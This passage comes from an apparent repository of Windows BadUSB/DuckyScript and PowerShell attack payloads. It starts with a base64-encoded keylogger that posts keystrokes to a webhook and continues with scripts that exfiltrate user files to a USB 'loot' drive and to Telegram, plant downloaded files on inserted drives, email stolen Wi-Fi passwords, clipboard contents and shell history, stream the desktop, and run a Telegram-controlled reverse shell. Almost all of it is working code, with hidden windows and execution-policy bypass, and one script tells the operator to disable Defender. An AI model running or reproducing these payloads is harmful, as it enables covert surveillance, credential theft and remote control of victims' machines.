'JGEgPSAnW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvLCBFeGFjdFNwZWxsaW5nPXRydWUpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBzaG9ydCBHZXRBc3luY0tleVN0YXRlKGludCB2aXJ0dWFsS2V5Q29kZSk7IFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBHZXRLZXlib2FyZFN0YXRlKGJ5dGVbXSBrZXlzdGF0ZSk7IFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBNYXBWaXJ0dWFsS2V5KHVpbnQgdUNvZGUsIGludCB1TWFwVHlwZSk7IFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBUb1VuaWNvZGUodWludCB3VmlydEtleSwgdWludCB3U2NhbkNvZGUsIGJ5dGVbXSBscGtleXN0YXRlLCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyIHB3c3pCdWZmLCBpbnQgY2NoQnVmZiwgdWludCB3RmxhZ3MpOyc7JGEgPSBBZGQtVHlwZSAtTWVtYmVyRGVmaW5pdGlvbiAkYSAtTmFtZSAnV2luMzInIC1OYW1lc3BhY2UgQVBJIC1QYXNzVGhydTskYiA9IFtTeXN0ZW0uRGlhZ25vc3RpY3MuU3RvcHdhdGNoXTo6U3RhcnROZXcoKTskYyA9IFtUaW1lU3Bhbl06OkZyb21TZWNvbmRzKDEwKTtXaGlsZSgkdHJ1ZSl7JGQgPSAkZmFsc2U7dHJ5e3doaWxlICgkYi5FbGFwc2VkIC1sdCAkYyl7U2xlZXAgLU1pbGxpc2Vjb25kcyAzMDtmb3IoJGUgPSA4OyAkZSAtbGUgMjU0OyAkZSsrKXskZiA9ICRhOjpHZXRBc3luY0tleVN0YXRlKCRlKTtpZiAoJGYgLWVxIC0zMjc2Nyl7JGQgPSAkdHJ1ZTskYi5SZXN0YXJ0KCk7JG51bGwgPSBbY29uc29sZV06OkNhcHNMb2NrOyRnID0gJGE6Ok1hcFZpcnR1YWxLZXkoJGUsIDMpOyRoID0gTmV3LU9iamVjdCBCeXRlW10gMjU2OyRqID0gJGE6OkdldEtleWJvYXJkU3RhdGUoJGgpOyRrID0gTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcjtpZigkYTo6VG9Vbmljb2RlKCRlLCAkZywgJGgsICRrLCAkay5DYXBhY2l0eSwgMCkpezskbCA9ICRrLlRvU3RyaW5nKCk7aWYgKCRlIC1lcSA4KSB7JGwgPSAiW0JLU1BdIn07aWYgKCRlIC1lcSAxMykgeyRsID0gIltFTlRdIn07aWYgKCRlIC1lcSAyNykgeyRsID0gIltFU0NdIn07JG0gKz0gJGx9fX19fWZpbmFsbHl7SWYoJGQpeyRuID0gJG0gLXJlcGxhY2UgJ1smPD5dJywgeyRhcmdzWzBdLlZhbHVlLlJlcGxhY2UoJyYnLCAnJmFtcDsnKS5SZXBsYWNlKCc8JywgJyZsdDsnKS5SZXBsYWNlKCc+JywgJyZndDsnKX07JG8gPSBHZXQtRGF0ZSAtRm9ybWF0ICJkZC1NTS15eXl5IEhIOm1tOnNzIjskcCA9ICRvKyIgOiAiKydgJyskbisnYCc7JHEgPSBAeyJ1c2VybmFtZSIgPSAiJGVudjpDT01QVVRFUk5BTUUiIDsiY29udGVudCIgPSAkcH0gfCBDb252ZXJ0VG8tSnNvbjtpcm0gLVVyaSAkZGMgLU1ldGhvZCBQb3N0IC1Db250ZW50VHlwZSAiYXBwbGljYXRpb24vanNvbiIgLUJvZHkgJHE7JGQgPSAkZmFsc2U7JG0gPSAiIn19JGIuUmVzdGFydCgpO1NsZWVwIC1NaWxsaXNlY29uZHMgMTB9' 25 | ENTER 26 | STRING $decodedFile = [System.Convert]::FromBase64String($b64);$decodedText = [System.Text.Encoding]::UTF8.GetString($decodedFile);$decodedText | Out-File -FilePath "$env:temp/a.ps1" -Append 27 | ENTER 28 | STRING Start-Process PowerShell.exe -ArgumentList ("-NoP -Ep Bypass -w h -File `"$env:temp/a.ps1`"" -f $PSCommandPath);sleep 7;Remove-Item -Path $File -Force;exit 29 | ENTER 30 | -------------------------------------------------------------------------------- /Exfiltrate-to-USB/main.ps1: -------------------------------------------------------------------------------- 1 | [Console]::BackgroundColor = "Black" 2 | [Console]::SetWindowSize(57, 5) 3 | [Console]::Title = "Exfiltration" 4 | Clear-Host 5 | 6 | if($driveName.length -lt 1){ 7 | $driveName = Read-Host "Enter the name of the USB drive " 8 | } 9 | 10 | if($hidden.length -lt 1){ 11 | $hidden = Read-Host "Would you like to hide this console window? (Y/N) " 12 | } 13 | 14 | $i = 10 15 | 16 | While ($true){ 17 | cls 18 | Write-Host "Waiting for USB Drive.. ($i)" -ForegroundColor Yellow 19 | $drive = Get-WMIObject Win32_LogicalDisk | ? {$_.VolumeName -eq $driveName} | select DeviceID 20 | sleep 1 21 | if ($drive.length -ne 0){ 22 | Write-Host "USB Drive Connected!" -ForegroundColor Green 23 | break 24 | } 25 | $i-- 26 | if ($i -eq 0 ){ 27 | Write-Host "Timeout! Exiting" -ForegroundColor Red 28 | sleep 1 29 | exit 30 | } 31 | } 32 | 33 | [Console]::SetWindowSize(80, 30) 34 | 35 | $drive = Get-WMIObject Win32_LogicalDisk | ? {$_.VolumeName -eq $driveName} 36 | $driveletter = $drive.DeviceID 37 | Write-Host "Loot Drive Set To : $driveLetter/" -ForegroundColor Green 38 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 39 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 40 | $destinationPath = "$driveLetter\$env:COMPUTERNAME-Loot" 41 | 42 | if (-not (Test-Path -Path $destinationPath)) { 43 | New-Item -ItemType Directory -Path $destinationPath -Force 44 | Write-Host "New Folder Created : $destinationPath" -ForegroundColor Green 45 | } 46 | 47 | If ($hidden -eq 'y'){ 48 | Write-Host "Hiding the Window.." -ForegroundColor Red 49 | sleep 1 50 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 51 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 52 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 53 | if($hwnd -ne [System.IntPtr]::Zero){ 54 | $Type::ShowWindowAsync($hwnd, 0) 55 | } 56 | else{ 57 | $Host.UI.RawUI.WindowTitle = 'hideme' 58 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 59 | $hwnd = $Proc.MainWindowHandle 60 | $Type::ShowWindowAsync($hwnd, 0) 61 | } 62 | } 63 | 64 | foreach ($folder in $foldersToSearch) { 65 | Write-Host "Searching in $folder" -ForegroundColor Yellow 66 | 67 | foreach ($extension in $fileExtensions) { 68 | $files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File 69 | 70 | foreach ($file in $files) { 71 | $destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name 72 | Write-Host "Copying $($file.FullName) to $($destinationFile)" -ForegroundColor Gray 73 | Copy-Item -Path $file.FullName -Destination $destinationFile -Force 74 | } 75 | } 76 | } 77 | If ($hidden -eq 'y'){ 78 | (New-Object -ComObject Wscript.Shell).Popup("File Exfiltration Complete",5,"Exfiltration",0x0) 79 | } 80 | else{ 81 | Write-Host "File Exfiltration Complete" -ForegroundColor Green 82 | } 83 | -------------------------------------------------------------------------------- /OSINT/Exfiltrate files to Telegram.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Exfiltrate files to Telegram. 2 | REM Author: @beigeworm 3 | REM Description: Using a Telegram Bot's Chat to receive all matching files in bulk zips of 50mb each. (searches user folders for pictures, video, text files etc..) 4 | REM Target: Windows 10 and 11 5 | 6 | REM SETUP INSTRUCTIONS 7 | REM 1. Install Telegram and make an account if you haven't already. 8 | REM 2. Visit https://t.me/botfather and make a bot. (make a note of the API token) 9 | REM 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start) 10 | REM 4. Run the script on target system 11 | REM 5. Check telegram chat for 'waiting to connect' message. 12 | REM 6. This script has a feature to wait until you start the session from Telegram. 13 | REM 7. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer. 14 | REM 8. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token 15 | 16 | REM some setup for dukie script 17 | DEFAULT_DELAY 100 18 | 19 | GUI r 20 | DELAY 750 21 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 22 | ENTER 23 | DELAY 4000 24 | STRING $Token = "TOKEN_HERE";$URL='https://api.telegram.org/bot{0}' -f $Token;while($chatID.length -eq 0){;$updates = Invoke-RestMethod -Uri ($url + "/getUpdates");if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1];if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}};Sleep 10};Function Exfiltrate {param ([string[]]$FileType,[string[]]$Path);$maxZipFileSize = 50MB;$currentZipSize = 0;$index = 1;$zipFilePath ="$env:temp/Loot$index.zip";$MessageToSend = New-Object psobject ;$MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." -Force;irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json";If($Path -ne $null){$foldersToSearch = "$env:USERPROFILE\"+$Path}else{$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")};If($FileType -ne $null){$fileExtensions = "*."+$FileType}else{$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")}Add-Type -AssemblyName System.IO.Compression.FileSystem;$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create');$escmsg = "Files from : "+$env:COMPUTERNAME;foreach ($folder in $foldersToSearch){foreach ($extension in $fileExtensions){$files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse;foreach ($file in $files) {$fileSize = $file.Length;if ($currentZipSize + $fileSize -gt $maxZipFileSize){$zipArchive.Dispose();$currentZipSize = 0;curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument";rm -Path $zipFilePath -Force;Sleep 1;$index++;$zipFilePath ="$env:temp/Loot$index.zip";$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')}$entryName = $file.FullName.Substring($folder.Length + 1);[System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName);$currentZipSize += $fileSize}}}$zipArchive.Dispose();curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument";rm -Path $zipFilePath -Force;Write-Output "$env:COMPUTERNAME : Exfiltration Complete."}Exfiltrate;sleep 5;exit 25 | DELAY 500 26 | ENTER 27 | -------------------------------------------------------------------------------- /USB-Poison/main.ps1: -------------------------------------------------------------------------------- 1 | <# ====================== USB POISON ========================== 2 | 3 | SYNOPSIS 4 | This script runs quietly in the background waiting for new USB storage devices. 5 | When a new device connects, this script will copy a desired file to the root of newly connected drive. 6 | 7 | USAGE 8 | 1. REPLACE the example file URL with your own. 9 | 2. Run the script 10 | 3. Your desired file will be downloaded to the 'temp' directory 11 | 4. When a new USB storage device is connected the file is copied 12 | 5. Use Task Manager to exit the script 13 | 14 | #> 15 | 16 | # Replace with your file direct download / raw link 17 | $fileURL = "$DLurl" 18 | $fileToCopy = "$File" # if zip is downloaded 19 | 20 | if ($fileURL.length -eq 0){ 21 | $fileURL = read-host "Enter direct download file URL " 22 | } 23 | 24 | if ($fileToCopy.length -eq 0){ 25 | $fileToCopy = read-host "Enter the filename (eg. stage.lnk) " 26 | } 27 | 28 | # Hidden Console (y/n) 29 | $hidden = 'y' 30 | 31 | If ($hidden -eq 'y'){ 32 | Write-Host "Hiding the Window.." -ForegroundColor Red 33 | sleep 1 34 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 35 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 36 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 37 | if($hwnd -ne [System.IntPtr]::Zero){ 38 | $Type::ShowWindowAsync($hwnd, 0) 39 | } 40 | else{ 41 | $Host.UI.RawUI.WindowTitle = 'hideme' 42 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 43 | $hwnd = $Proc.MainWindowHandle 44 | $Type::ShowWindowAsync($hwnd, 0) 45 | } 46 | } 47 | 48 | function DownloadAndExtract-Zip { 49 | param ([string]$fileURL,[string]$filename) 50 | 51 | $filename = Split-Path -Path $fileURL -Leaf 52 | $tempDir = [System.IO.Path]::GetTempPath() 53 | $filepath = "$tempDir\$filename" 54 | 55 | try { 56 | Invoke-WebRequest -Uri $fileURL -OutFile $filepath 57 | Write-Host "File downloaded to $filepath" 58 | } catch { 59 | Write-Error "Failed to download file from $fileURL" 60 | return 61 | } 62 | 63 | if ($filename -like "*.zip") { 64 | Write-Host "File is a ZIP archive. Extracting contents..." 65 | 66 | $extractPath = $tempDir 67 | 68 | try { 69 | Add-Type -AssemblyName System.IO.Compression.FileSystem 70 | [System.IO.Compression.ZipFile]::ExtractToDirectory($filepath, $extractPath) 71 | Write-Host "Files extracted to $extractPath" 72 | } catch { 73 | Write-Error "Failed to extract the ZIP file" 74 | } 75 | } else { 76 | Write-Host "Downloaded file is not a ZIP archive. No extraction needed." 77 | } 78 | } 79 | 80 | DownloadAndExtract-Zip -fileURL $fileURL 81 | 82 | while($true){ 83 | $tempDir = [System.IO.Path]::GetTempPath() 84 | $fileToCopy = "$tempDir\$fileToCopy" 85 | $initialDrives = Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID 86 | while ($true){ 87 | $currentDrives = Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID 88 | $newDrive = $currentDrives | Where-Object { $initialDrives.DeviceID -notcontains $_.DeviceID} 89 | if ($newDrive){ 90 | $drive = Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | Where-Object { $initialDrives.DeviceID -notcontains $_.DeviceID} 91 | $driveletter = ($drive.DeviceID + '/') 92 | Copy-Item -Path $fileToCopy -Destination $driveletter 93 | sleep 1 94 | break 95 | } 96 | sleep 1 97 | } 98 | 99 | sleep 1 100 | } 101 | -------------------------------------------------------------------------------- /OSINT/Email System & User Information.txt: -------------------------------------------------------------------------------- 1 | REM Title: Email System & User Information 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to gather user and system information and send to an Email. 4 | REM Target: Windows 10 5 | 6 | REM *REQUIREMENTS* 7 | REM you will need a Microsoft Outlook Email address for this to work 8 | 9 | REM *SETUP* 10 | REM replace EMAIL_HERE and PASSWORD_HERE below. 11 | 12 | REM some setup for dukie script. 13 | DEFAULT_DELAY 100 14 | 15 | REM open powershell (remove -W Hidden to show the window). 16 | GUI r 17 | DELAY 750 18 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 19 | CTRL-SHIFT ENTER 20 | DELAY 1500 21 | ALT y 22 | DELAY 5000 23 | 24 | REM replace EMAIL_HERE and PASSWORD_HERE below. 25 | STRING $eml = "EMAIL_HERE";$psw = "PASSWORD_HERE" 26 | 27 | REM main powershell code 28 | ENTER 29 | DELAY 100 30 | STRING ;$usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) 31 | STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem 32 | STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount 33 | STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" 34 | STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version 35 | STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} 36 | 37 | STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" 38 | STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ 39 | STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" 40 | STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassw: $pass`n"}}}$a++;} 41 | STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 42 | 43 | STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 44 | STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 45 | STRING ;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 46 | STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 47 | STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 48 | STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 49 | 50 | STRING ;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" 51 | STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $eml, ($psw | ConvertTo-SecureString -AsPlainText -Force) 52 | STRING ;$time = Get-Date;$ct = $time.addminutes($lost) 53 | 54 | STRING ;send-mailmessage -from $eml -to $eml -subject $subj -body $body -Attachment $syslog -smtpServer $smtp -port $prt -credential $cdtl -usessl 55 | STRING ;sleep 1;exit 56 | ENTER 57 | -------------------------------------------------------------------------------- /OSINT/Desktop Screenshare over LAN.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Desktop Screenshare over HTTP. 2 | REM Author: @beigeworm 3 | REM Description: Using a Telegram Bot's Chat to receive a screenshot of the desktop. 4 | REM Target: Windows 10 and 11 5 | 6 | REM SETUP INSTRUCTIONS 7 | REM 4. Run the script on target system 8 | REM 2. Wait for a message box with the ip address. 9 | REM 3. Type IP in browser on another device on the same network 10 | REM 4. (this Script will prompt for admin to enable opening port 8080 on the machine) 11 | 12 | REM some setup for dukie script 13 | DEFAULT_DELAY 100 14 | 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 18 | ENTER 19 | DELAY 4000 20 | STRING $HideWindow = "true";$Host.UI.RawUI.BackgroundColor = "Black";Clear-Host;$width = 88;$height = 30;[Console]::SetWindowSize($width, $height);$windowTitle = "HTTP Screenshare";[Console]::Title = $windowTitle;Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName PresentationCore,PresentationFramework;Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.Application]::EnableVisualStyles();if($HideWindow -eq "true"){If(!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')){sleep 1;Start-Process PowerShell.exe -ArgumentList ("-NoProfile -Ep Bypass -W Hidden -File `"{0}`"" -f $PSCommandPath) -Verb RunAs;Exit}}else{If(!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')){sleep 1;Start-Process PowerShell.exe -ArgumentList ("-NoProfile -Ep Bypass -File `"{0}`"" -f $PSCommandPath) -Verb RunAs;Exit}}Write-Host "Detecting primary network interface." -ForegroundColor DarkGray;$networkInterfaces = Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'Virtual' };$filteredInterfaces = $networkInterfaces | Where-Object { $_.Name -match 'Wi*' -or $_.Name -match 'Eth*'};$primaryInterface = $filteredInterfaces | Select-Object -First 1;if($primaryInterface){if($primaryInterface.Name -match 'Wi*'){Write-Output "Wi-Fi is the primary internet connection.";$loip = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias "Wi*" | Select-Object -ExpandProperty IPAddress}elseif($primaryInterface.Name -match 'Eth*'){Write-Output "Ethernet is the primary internet connection.";$loip = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias "Eth*" | Select-Object -ExpandProperty IPAddress}else{Write-Output "Unknown primary internet connection."}}else{Write-Output "No primary internet connection found."}$refreshIntervalInSeconds = 0.5;New-NetFirewallRule -DisplayName "AllowWebServer" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow | Out-Null;$webServer = New-Object System.Net.HttpListener ;$webServer.Prefixes.Add("http://"+$loip+":8080/");$webServer.Prefixes.Add("http://localhost:8080/");$webServer.Start();Write-Host ("Network Devices Can Reach the server at : http://"+$loip+":5000");Start-Process msg.exe -ArgumentList ("* `" SERVER IP : http://$loip`:8080`"");while($true){$screen = [System.Windows.Forms.Screen]::PrimaryScreen;$bitmap = New-Object System.Drawing.Bitmap $screen.Bounds.Width, $screen.Bounds.Height;$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen($screen.Bounds.X, $screen.Bounds.Y, 0, 0, $screen.Bounds.Size);$stream = New-Object System.IO.MemoryStream ;$bitmap.Save($stream, [System.Drawing.Imaging.ImageFormat]::Png);$stream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null;$webServerContext = $webServer.GetContext() ;$request = $webServerContext.Request;$response = $webServerContext.Response;if($request.RawUrl -eq "/stream"){$response.ContentType = "image/png";$stream.CopyTo($response.OutputStream)}else{$response.ContentType = "text/html";$refreshScript = "Streaming VideoStreaming Video";$buffer = [System.Text.Encoding]::UTF8.GetBytes($refreshScript);$response.OutputStream.Write($buffer, 0, $buffer.Length)}$response.Close();$stream.Dispose()}$webServer.Stop();exit 21 | DELAY 500 22 | ENTER 23 | -------------------------------------------------------------------------------- /Reverse Shells and C2/Telegram Reverse Shell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Simple Telegram Reverse Shell 2 | REM Author: @beigeworm 3 | REM Description: A script that connects target computer with a telegram chat to send powershell commands. 4 | REM The script will wait in a loop until you interact with it later on via telegram. 5 | REM Target: Windows 10,11 6 | 7 | REM SETUP INSTRUCTIONS 8 | REM 1. visit https://t.me/botfather and make a bot. 9 | REM 2. add bot api to script. 10 | REM 3. search for bot in top left box in telegram and start a chat then type /start. 11 | REM 4. add chat ID in 'CHAT_ID_HERE' for the chat bot (run this code below to find the chat id) 12 | REM --------------------------------------------------- 13 | REM 5. Run Script on target System 14 | REM 6. Check telegram chat for 'waiting to connect' message. 15 | REM 7. this script has a feature to wait until you start the session from telegram. 16 | REM 8. type in the computer name from that message into telegram bot chat to connect to that computer. 17 | 18 | REM THIS SCRIPT IS A PROOF OF CONCEPT FOR EDUCATIONAL PURPOSES ONLY. 19 | 20 | REM Setup for duckyscript 21 | DEFAULT_DELAY 100 22 | 23 | REM open powershell (remove -W Hidden to show the window) 24 | GUI r 25 | DELAY 750 26 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 27 | CTRL-SHIFT ENTER 28 | DELAY 1500 29 | ALT y 30 | DELAY 4000 31 | 32 | STRING $Token = 'YOUR_TOKEN_HERE';$PassPhrase = "$env:COMPUTERNAME";$URL='https://api.telegram.org/bot{0}' -f $Token ;while($chatID.length -eq 0){$updates = Invoke-RestMethod -Uri ($url + "/getUpdates");if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1];if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}};Sleep 10}$AccSesH="";$LastUmsg="";$LastmsgID="";sleep 1;$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME Waiting to Connect..";Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body ($Mtsend | ConvertTo-Json) -ContentType "application/json";Sleep 5;Function IsAuth{param($CheckMessage)if (($messages.message.date -ne $LastUmsg) -and ($CheckMessage.message.text -like $PassPhrase) -and ($CheckMessage.message.from.is_bot -like $false)){$script:AccSesH="Authenticated";$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME Session Started.";Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body ($Mtsend | ConvertTo-Json) -ContentType "application/json";return $messages.message.chat.id}Else{return 0}};Function StrmFX{param($Stream)$FixRslt=@();$Stream | Out-File -FilePath (Join-Path $env:TMP -ChildPath "TGPSMessages.txt") -Force;$ReadAsArray= Get-Content -Path (Join-Path $env:TMP -ChildPath "TGPSMessages.txt") | where {$_.length -gt 0};foreach ($line in $ReadAsArray){;$ArrObj=New-Object psobject;$ArrObj | Add-Member -MemberType NoteProperty -Name "Line" -Value ($line).tostring();$FixRslt +=$ArrObj}return $FixRslt};Function stgmsg{param($Messagetext,$ChatID)$FixedText=StrmFX -Stream $Messagetext;$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value $FixedText.line;$JsonData=($Mtsend | ConvertTo-Json);Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body $JsonData -ContentType "application/json"};Function rtgmsg{try{$inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates') -ErrorAction Stop;return $inMessage.result[-1]}Catch{return "Fail"}};Sleep 3;While ($true){sleep 2;$messages=rtgmsg;if($LastUmsg -like $null){$LastUmsg=$messages.message.date};if(!($AccSesH)){$CheckAuthentication=IsAuth -CheckMessage $messages}Else{if(($CheckAuthentication -ne 0) -and ($messages.message.text -notlike $PassPhrase) -and ($messages.message.date -ne $LastmsgID)){try{$Result=ie`x($messages.message.text) -ErrorAction Stop;$Result;stgmsg -Messagetext $Result -ChatID $messages.message.chat.id}catch{stgmsg -Messagetext ($_.exception.message) -ChatID $messages.message.chat.id}Finally{$LastmsgID=$messages.message.date}}}};sleep 5;exit 33 | 34 | ENTER 35 | -------------------------------------------------------------------------------- /OSINT/Email System Info with Screenshot.txt: -------------------------------------------------------------------------------- 1 | REM Title: Email System & User Information 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to gather user and system information and send to an Email. 4 | REM Target: Windows 10 5 | 6 | REM *IMPORTANT NOTE - upon testing 7th may 23, this script is detected by defender and blocked* 7 | REM TURN OFF RT-PROTECTION BEFORE RUNNING 8 | 9 | REM *REQUIREMENTS* 10 | REM you will need a Microsoft Outlook Email address for this to work 11 | 12 | REM *SETUP* 13 | REM replace EMAIL_HERE and PASSWORD_HERE below. 14 | 15 | REM some setup for dukie script. 16 | DEFAULT_DELAY 100 17 | 18 | REM open powershell (remove -W Hidden to show the window). 19 | GUI r 20 | DELAY 750 21 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 22 | CTRL-SHIFT ENTER 23 | DELAY 1500 24 | ALT y 25 | DELAY 5000 26 | 27 | REM replace EMAIL_HERE and PASSWORD_HERE below. 28 | STRING ;$email = 